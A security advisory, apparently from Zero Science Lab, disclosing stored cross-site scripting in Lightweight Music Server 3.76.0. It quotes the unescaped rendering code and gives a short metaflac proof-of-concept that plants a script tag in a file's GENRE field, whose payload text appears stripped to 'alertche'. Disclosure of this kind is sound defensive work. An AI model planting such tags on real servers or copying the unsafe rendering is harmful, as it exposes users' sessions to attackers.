zeroscience
ZSL Bot v4.89.1.00
Код:
Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS
Vendor: Emeric Poupon
Product web page: https://github.com/epoupon/lms
Affected version 3.76.0
Summary: LMS (Lightweight Music Server): A specific C++ based
project focused on a low memory footprint, featuring built-in
user management and a recommendation engine.
Desc: LMS stores media file metadata tags (such as GENRE, ARTIST,
and ALBUM) exactly as written in the file and later renders them
in its web interface without HTML-encoding, resulting in stored
cross-site scripting. An attacker who gets a file with a malicious
tag into the victim's library has their payload saved during the
next library scan and executed automatically whenever a user views
that track's information or plays the file in the web UI.
--------------------------------------------------------------
/src/lms/ui/Utils.cpp
---------------------
131: std::unique_ptr<Wt::WInteractWidget> createFilter(const Wt::WString& name, const Wt::WString& tooltip, std::string_view colorStyleClass, bool canDelete)
132: {
133: auto res{ std::make_unique<Wt::WText>(Wt::WString{ canDelete ? "<i class=\"fa fa-times-circle\"></i> " : "" } + name, Wt::TextFormat::UnsafeXHTML) };
134: res->setStyleClass("Lms-badge-cluster badge me-1 " + std::string{ colorStyleClass });
135: res->setInline(true);
136: return res;
137: }
--------------------------------------------------------------
Tested on: GNU/Linux (ARM64)
nginx
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5987
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5987
27.05.2026
--
$ metaflac --set-tag=GENRE="alertche" evil.flac
$ metaflac --list evil.flac
METADATA block #0
type: 0 (STREAMINFO)
is last: false
length: 34
minimum blocksize: 4608 samples
maximum blocksize: 4608 samples
minimum framesize: 2305 bytes
maximum framesize: 14124 bytes
sample_rate: 44100 Hz
channels: 2
bits-per-sample: 16
total samples: 4664587
MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d
METADATA block #1
type: 4 (VORBIS_COMMENT)
is last: false
length: 98
vendor string: Lavf57.83.100
comments: 2
comment[0]: encoder=Lavf57.83.100
comment[1]: GENRE=alertche
METADATA block #2
type: 1 (PADDING)
is last: true
length: 8140
Zero Science Lab — Macedonian Information Security Research & Development Laboratory
Independent information security research and development laboratory. Vulnerability research, penetration testing, ICS/SCADA security, exploit development, and responsible disclosure.
